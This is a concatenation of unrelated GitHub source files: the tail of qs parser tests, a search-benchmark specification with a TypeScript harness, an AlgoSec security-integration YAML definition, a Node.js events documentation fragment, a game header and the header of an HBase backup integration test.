hasOwnProperty: 'b' } 
}, { prototype: false }); expect(Qs.parse('hasOwnProperty=b', { allowPrototypes: true })).to.deep.equal({ hasOwnProperty: 'b' }, { prototype: false }); done(); }); it('can return plain objects', function (done) { var expected = Object.create(null); expected.a = Object.create(null); expected.a.b = 'c'; expected.a.hasOwnProperty = 'd'; expect(Qs.parse('a[b]=c&a[hasOwnProperty]=d', { plainObjects: true })).to.deep.equal(expected); expect(Qs.parse(null, { plainObjects: true })).to.deep.equal(Object.create(null)); var expectedArray = Object.create(null); expectedArray.a = Object.create(null); expectedArray.a['0'] = 'b'; expectedArray.a.c = 'd'; expect(Qs.parse('a[]=b&a[c]=d', { plainObjects: true })).to.deep.equal(expectedArray); done(); }); });
{ "pile_set_name": "Github" }
Benchmark for Searching:

(0) Identify a search domain S from which strings of the same size are drawn.
    These strings will form the target data structure as well as the strings
    to be searched for. The size of the search domain is |S| = n = 2^k.

    For example, S4 could be the set of 4-character strings over the
    alphabet {a,b}. Note that |S4| = 2^4 = 16.

(1) Construct a target instance of the data structure of size c*n, where c is
    in the range [0.5, 1.0]. This instance is constructed by repeated
    application of the insert operation on the data structure. It is
    guaranteed that no string appears more than once in the target instance;
    c is the fraction of the available elements that end up in the target
    instance. The target instance is constructed by the following algorithm:

        Create array SA whose size is |S| and contains all elements of S.
        idx = n; ct = 0;
        while (ct < c*n) {
            select random index i from [0,idx)
            DS.insert(SA[i]);
            swap SA[i] with SA[idx-1];
            idx--;
            ct++;
        }

    Drawing without replacement in this way ensures that DS contains no
    duplicates. For example, c could be 0.5 and DS could be a linear list:

        aaab baba abaa bbbb baaa aaaa aaba babb

    Note that here, the list is unordered.

(2) Construct a SearchList of search strings to be searched for. The size of
    SearchList is n/4. This SearchList is constructed in two separate ways:

    (a) uniform distribution; as with step 1, each string in the SearchList
        is drawn randomly from S and is never duplicated in SearchList.

    (b) weighted distribution; given the original search domain S, assign
        search probabilities to the individual strings in S:

            1 string will never be searched
            1 string will be searched 50% of the time
            2 strings will be searched 25% of the time
            4 strings will be searched 12.5% of the time
            8 strings will be searched 6.25% of the time
            ...
            2^(k-1) strings will be searched 1/2^k of the time

        Given the set S4 above, the following could be the weighted search
        probabilities:

            String   Search-prob.
            ------   ------------
            aaaa     0
            aaab     8
            aaba     4
            aabb     4
            abaa     2
            abab     2
            abba     2
            abbb     2
            baaa     1
            baab     1
            baba     1
            babb     1
            bbaa     1
            bbab     1
            bbba     1
            bbbb     1

        Equivalently, the initial setup identifies the following classes of
        strings:

            1 string will never be searched for
            n/2 of the strings will be searched for one time
            n/4 of the strings will be searched for two times
            n/8 will be searched for four times
            n/16 will be searched for eight times
            n/32 will be searched for sixteen times
            ...

(3) For each element in SearchList, search for the item. Measure the number
    of "probes", that is, inspections within the target data structure for
    the given element. Also keep track of total time so you can compute the
    average cost of a search.
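To make the steps above concrete, here is a minimal sketch of the harness in
TypeScript. It is an illustration under stated assumptions, not a reference
implementation: the names (SearchDS, buildDomain, buildWeightedSearchList,
runBenchmark) are invented, a plain unordered array stands in for the data
structure under test, and the weighted SearchList is drawn with replacement
according to the relative weights described above.

// Abstract view of the data structure under test: insert plus a search that
// reports how many elements were inspected ("probes").
type SearchDS = {
  insert(s: string): void;
  search(s: string): { found: boolean; probes: number };
};

// Unordered linear list, used only to make the sketch runnable.
function makeLinearList(): SearchDS {
  const items: string[] = [];
  return {
    insert(s) { items.push(s); },
    search(s) {
      let probes = 0;
      for (const item of items) {
        probes++;
        if (item === s) return { found: true, probes };
      }
      return { found: false, probes };
    },
  };
}

// Step 0: the search domain S_k = all k-character strings over {a, b}.
function buildDomain(k: number): string[] {
  const out: string[] = [];
  for (let i = 0; i < (1 << k); i++) {
    let s = "";
    for (let bit = k - 1; bit >= 0; bit--) s += ((i >> bit) & 1) ? "b" : "a";
    out.push(s);
  }
  return out;
}

// Step 1: build the target instance of size c*n by drawing without
// replacement, using the swap-to-the-end algorithm from the spec.
function buildTarget(domain: string[], c: number, ds: SearchDS): void {
  const sa = domain.slice();
  let idx = sa.length;
  const target = Math.floor(c * sa.length);
  for (let ct = 0; ct < target; ct++) {
    const i = Math.floor(Math.random() * idx);
    ds.insert(sa[i]);
    [sa[i], sa[idx - 1]] = [sa[idx - 1], sa[i]];
    idx--;
  }
}

// Step 2b: weighted SearchList. Group j (j = 1..k) holds 2^(j-1) strings,
// each with relative weight 2^(k-j); one extra string is never searched.
function buildWeightedSearchList(domain: string[], k: number, size: number): string[] {
  const weights: number[] = new Array(domain.length).fill(0);
  let pos = 1; // domain[0] is never searched
  for (let j = 1; j <= k; j++) {
    const groupSize = 1 << (j - 1);
    const w = 1 << (k - j);
    for (let g = 0; g < groupSize && pos < domain.length; g++, pos++) weights[pos] = w;
  }
  const total = weights.reduce((a, b) => a + b, 0);
  const list: string[] = [];
  for (let i = 0; i < size; i++) {
    let r = Math.random() * total;
    let idx = 0;
    while (idx < weights.length - 1 && r >= weights[idx]) { r -= weights[idx]; idx++; }
    list.push(domain[idx]);
  }
  return list;
}

// Step 3: run the searches and report the average number of probes.
function runBenchmark(k: number, c: number): void {
  const domain = buildDomain(k);
  const ds = makeLinearList();
  buildTarget(domain, c, ds);
  const searches = buildWeightedSearchList(domain, k, domain.length / 4);
  let probes = 0;
  for (const s of searches) probes += ds.search(s).probes;
  console.log(`avg probes = ${(probes / searches.length).toFixed(2)}`);
}

runBenchmark(4, 0.5);

Swapping makeLinearList() for the real data structure under test (ordered
list, BST, hash table, ...) is the only change needed to benchmark it.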
{ "pile_set_name": "Github" }
commonfields: id: AlgoSec version: -1 name: AlgoSec display: AlgoSec system: true category: Network Security image: data:image/png;base64,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 description: Algosec BusinessFlow(ABF), Firewall Analyzer (AFA) and FireFlow(AFF). configuration: - display: Server URL (e.g. 
https://192.168.0.1) name: server defaultvalue: "" type: 0 required: true - display: Credentials name: credentials defaultvalue: "" type: 9 required: true - display: Trust any certificate (not secure) name: insecure defaultvalue: "" type: 8 required: false - display: Use system proxy settings name: proxy defaultvalue: "" type: 8 required: false script: script: >- var username = params.credentials.identifier; var password = params.credentials.password; var server = params.server.replace(/[\/]+$/, ''); var insecure = params.insecure; var proxy = params.proxy; var baseAFF = server + '/WebServices/WSDispatcher.pl'; var baseAFA = server + '/afa/php/ws.php'; var baseBF = server + '/BusinessFlow/rest/v1/network_objects/find'; function fillInSoapContent(content, service) { var request = service === 'AFF' ? '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsh="https://www.algosec.com/WSHandler"><soapenv:Header/><soapenv:Body>%content%</soapenv:Body></soapenv:Envelope>' : '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:afa="https://www.algosec.com/afa-ws"><soapenv:Header/><soapenv:Body>%content%</soapenv:Body></soapenv:Envelope>'; return replaceInTemplates(request, {content: content}); } function fillInSOAPRequestTemplate(method, content, service) { var template = service === 'AFF' ? '<wsh:%method%><FFWSHeader><version>1</version></FFWSHeader>%content%</wsh:%method%>' : '<afa:%method%>%content%</afa:%method%>'; return fillInSoapContent(replaceInTemplates(template, {content: content, method: method}), service); } var responseDict = { 'authenticate': /<sessionId xsi:type="xsd:string">(.*)<\/sessionId/, 'getTicket': /<soap:Body>((.|\n)*)<\/soap:Body/, 'createTicket': /<soap:Body>((.|\n)*)<\/soap:Body/, 'ConnectRequest': /<SessionID>(.*)<\/SessionID/, 'DisconnectRequest': /<ns1:DisconnectResponse>(.*)<\/ns1:DisconnectResponse/, 'QueryRequest': /<SOAP-ENV:Body>((.|\n)*)<\/SOAP-ENV:Body/ }; var commandToMethod = { 'algosec-get-ticket': 'getTicket', 'algosec-create-ticket': 'createTicket', 'algosec-query': 'QueryRequest' }; var commandToURL = { 'algosec-get-applications': '/applications', 'algosec-get-network-object': '' }; var sessionData = '<sessionId>%sessionId%</sessionId>'; var methodDict = { 'authenticate': '<username>%username%</username><password>%password%</password>', 'getTicket': sessionData + '<ticketId>%ticketId%</ticketId>', 'trafficLines': '<trafficLines><action>%action%</action><trafficDestination><address>%destAddress%</address></trafficDestination><trafficService><service>ftp</service></trafficService><trafficSource><address>%sourceAddress%</address></trafficSource><trafficUser><user>%user%</user></trafficUser><trafficApplication><application>%application%</application></trafficApplication></trafficLines>', 'createTicket': sessionData + '<ticket><requestor>%requestor%</requestor><subject>%subject%</subject>%trafficLines%</ticket>', 'ConnectRequest': '<UserName>%username%</UserName><Password>%password%</Password>', 'DisconnectRequest': '<SessionID>%sessionId%</SessionID>', 'QueryRequest': '<SessionID>%sessionId%</SessionID><QueryInput>%query%</QueryInput>', 'QueryInput': '<Source>%source%</Source><Destination>%destination%</Destination><Service>%service%</Service>' }; var affCommands = ['algosec-create-ticket', 'algosec-get-ticket']; var bfCommands = ['algosec-get-applications', 'algosec-get-network-object']; function createTemplate(method, args) { switch (method) { case 'createTicket': var trafficLines = 
(args.description ? '<description>"%description%"</description>' : '') + methodDict['trafficLines']; return replaceInTemplates(methodDict[method], {trafficLines: trafficLines}); case 'QueryRequest': var query = methodDict['QueryInput'] + (args.user ? '<User>%user%</User>' : '') + (args.application ? '<Application>%application%</Application>' : ''); return replaceInTemplates(methodDict[method], {query: query}); default: return methodDict[method]; } } function sendSOAPRequest(method, args, service) { var req = fillInSOAPRequestTemplate(method, replaceInTemplates(createTemplate(method, args), args), service); var res = http( service === 'AFF' ? baseAFF : baseAFA, { Method: 'POST', Body: req }, insecure, proxy ); if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Failed to ' + method + ', request status code: ' + res.StatusCode + ' and Body: ' + res.Body + '.'; } return res.Body; } function sendRESTRequest(url, args) { var res = http( baseBF + url + encodeToURLQuery(args), { Method: 'GET', Username: username, Password: password }, insecure, proxy ); if (res.StatusCode < 200 || res.StatusCode >= 300) { throw 'Failed to ' + url + ', request status code: ' + res.StatusCode + ' and Body: ' + res.Body + '.'; } return res.Body; } function sendAndParse(method, args, service) { var responseXML = sendSOAPRequest(method, args, service); var match = responseDict[method].exec(responseXML); if (match && match[1]) { return match[1]; } throw method +' failed'; } if (command === 'test-module') { if (sendAndParse('authenticate', {username: username, password: password}, 'AFF')) { return 'ok'; } return 'something is wrong'; } if (affCommands.indexOf(command) !== -1) { args.sessionId = sendAndParse('authenticate', {username: username, password: password}, 'AFF'); return JSON.parse(x2j(sendAndParse(commandToMethod[command], args, 'AFF'))); } if (bfCommands.indexOf(command) !== -1) { return JSON.parse(sendRESTRequest(commandToURL[command] ,args)); } args.sessionId = sendAndParse('ConnectRequest', {username: username, password: password}, 'AFA'); res = JSON.parse(x2j(sendAndParse(commandToMethod[command], args))); sendAndParse('DisconnectRequest', {sessionId: args.sessionId}, 'AFA'); return res; type: javascript commands: - name: algosec-get-ticket arguments: - name: ticketId required: true default: true description: ID of requested change request description: Retrieves a FireFlow change request by its ID - name: algosec-create-ticket arguments: - name: description description: A free text description of the issue - name: devices description: A list of device names, on which the change should be made - name: action required: true description: | The device action to perform for the traffic. 
This can be either of the following: \U0010FC00 1 - Allow the traffic \U0010FC00 0 - Block the traffic predefined: - "0" - "1" - name: destAddress required: true description: The destination address to perform the action on - name: sourceAddress required: true description: The source address to perform the action on - name: requestor required: true description: The email address of the requestor - name: subject required: true description: The change request's title - name: service required: true description: The device service or port for the connection, for example, "http" or Mandatory "tcp/123" - name: user required: true description: The user for the connection - name: application required: true description: The application for the connection description: Creates a new FireFlow change request - name: algosec-get-applications arguments: - name: address required: true default: true description: The IP/Subnet to search - name: type auto: PREDEFINED predefined: - INTERSECT - CONTAINED - CONTAINING - EXACT description: The search method for the address description: Find applications containing network objects related to IP address using BusinessFlow - name: algosec-get-network-object arguments: - name: address required: true default: true description: The IP/Subnet to search - name: type auto: PREDEFINED predefined: - INTERSECT - CONTAINED - CONTAINING - EXACT description: The search method for the address (default is INTERSECT) description: Find network objects related to IP address - name: algosec-query arguments: - name: source required: true default: true description: source(s) for the query. Multiple values are separated by commas (,) - name: destination required: true description: destination(s) for the query. Multiple values are separated by commas (,) - name: service required: true description: service(s) for the query. Multiple values are separated by commas (,) - name: user description: user for the query - name: application description: application for the query description: Performs a batch traffic simulation query using Firewall Analyzer runonce: false tests: - No tests fromversion: 5.0.0
{ "pile_set_name": "Github" }
<!-- YAML added: - v13.4.0 - v12.16.0 --> > Stability: 1 - captureRejections is experimental. Value: `Symbol.for('nodejs.rejection')` See how to write a custom [rejection handler][rejection].
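For example, an emitter that opts in to rejection capture can implement the
handler directly via the symbol. This is a minimal sketch in TypeScript;
`MyEmitter` and `destroy()` are illustrative names, not part of the API:

```ts
import { EventEmitter, captureRejectionSymbol } from 'events';

class MyEmitter extends EventEmitter {
  constructor() {
    // Opt in: rejections from async listeners are routed to the handler below.
    super({ captureRejections: true });
  }

  // captureRejectionSymbol === Symbol.for('nodejs.rejection')
  [captureRejectionSymbol](err: Error, event: string, ...args: unknown[]) {
    console.log(`rejection happened for ${event} with`, err, ...args);
    this.destroy(err);
  }

  destroy(err: Error) {
    // Tear down any resources owned by the emitter here.
  }
}
```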
{ "pile_set_name": "Github" }
A line of text 1
A line of text 2
A line of text 3
A line of text 4
{ "pile_set_name": "Github" }
/* Copyright (c) 2002-2012 Croteam Ltd. 
This program is free software; you can redistribute it and/or modify
it under the terms of version 2 of the GNU General Public License as published by
the Free Software Foundation

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */

// Animation names
#define FLOOR_ANIM_DEFAULT_ANIMATION 0

// Color names

// Patch names

// Names of collision boxes
#define FLOOR_COLLISION_BOX_PART_NAME 0

// Attaching position names

// Sound names
{ "pile_set_name": "Github" }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase; import static org.junit.Assert.assertTrue; import java.io.IOException; import java.nio.charset.Charset; import java.util.ArrayList; import java.util.List; import java.util.Set; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.backup.BackupAdmin; import org.apache.hadoop.hbase.backup.BackupInfo; import org.apache.hadoop.hbase.backup.BackupInfo.BackupState; import org.apache.hadoop.hbase.backup.BackupRequest; import org.apache.hadoop.hbase.backup.BackupRestoreConstants; import org.apache.hadoop.hbase.backup.BackupType; import org.apache.hadoop.hbase.backup.RestoreRequest; import org.apache.hadoop.hbase.backup.impl.BackupAdminImpl; import org.apache.hadoop.hbase.backup.impl.BackupManager; import org.apache.hadoop.hbase.backup.impl.BackupSystemTable; import org.apache.hadoop.hbase.chaos.actions.RestartRandomRsExceptMetaAction; import org.apache.hadoop.hbase.chaos.monkies.PolicyBasedChaosMonkey; import org.apache.hadoop.hbase.chaos.policies.PeriodicRandomActionPolicy; import org.apache.hadoop.hbase.chaos.policies.Policy; import org.apache.hadoop.hbase.client.Admin; import org.apache.hadoop.hbase.client.ColumnFamilyDescriptor; import org.apache.hadoop.hbase.client.ColumnFamilyDescriptorBuilder; import org.apache.hadoop.hbase.client.Connection; import org.apache.hadoop.hbase.client.Table; import org.apache.hadoop.hbase.client.TableDescriptor; import org.apache.hadoop.hbase.client.TableDescriptorBuilder; import org.apache.hadoop.hbase.testclassification.IntegrationTests; import org.apache.hadoop.util.ToolRunner; import org.apache.hbase.thirdparty.com.google.common.base.MoreObjects; import org.apache.hbase.thirdparty.com.google.common.collect.Lists; import org.apache.hbase.thirdparty.com.google.common.util.concurrent.Uninterruptibles; import org.apache.hbase.thirdparty.org.apache.commons.cli.CommandLine; import org.junit.After; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import org.junit.experimental.categories.Category; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * An integration test to detect regressions in HBASE-7912. 
